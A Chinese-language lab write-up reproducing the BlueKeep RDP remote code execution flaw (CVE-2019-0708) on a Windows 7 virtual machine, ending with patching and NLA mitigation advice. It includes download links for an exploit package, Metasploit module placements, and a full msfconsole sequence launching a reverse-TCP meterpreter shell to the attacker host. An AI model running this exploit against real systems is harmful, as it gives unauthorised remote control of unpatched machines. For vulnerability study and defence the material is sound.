远程桌面代码执行漏洞（cve-2019-0708）

1.影响版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

2.漏洞描述

       Microsoft Windows中存在远程桌面执行代码漏洞，该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞，网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时，远程桌面服务（以前称为“终端服务”）中存在远程执行代码漏洞。此漏洞是预身份验证，无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

3.环境准备

镜像：Windows 7 sp1 (链接: https://pan.baidu.com/s/1GaD8DCFempeQ1AyroaND8g 提取码: 3ivg)
Exp：链接：https://pan.baidu.com/s/1sw2UaJ1uyYD6WSL7ACTIBw 提取码：ae0a

攻击机器：Kali 192.168.157.130

受害机器：win7 sp1:192.168.157.143

4.漏洞复现

1)在Vmware中安装镜像，受害主机开启远程桌面连接服务

2）配置msf，将exp放置到msf对应文件夹下，如果同名直接覆盖（以Kali为例）

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb ->/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

3）加载攻击模块，配置参数

root@kali:~# msfconsole
msf5 > reload_all # 加载0708exp
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhost 192.168.157.143
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.157.130
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 1919
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

4)攻击成功，获取shell

       使用show targets可查看相关选项，设置target我选2，虽然应该选择3，3是VMware，可是选择3会使得目标蓝屏，选2才能反弹shell

5.漏洞修复

1）及时去微软官网打对应系统的安全补丁；

2）关闭3389端口或添加防火墙安全策略限制对3389端口的访问；

3）打不了补丁的可以开启远程桌面（网络级别身份验证(NLA)），可以临时防止漏洞攻击。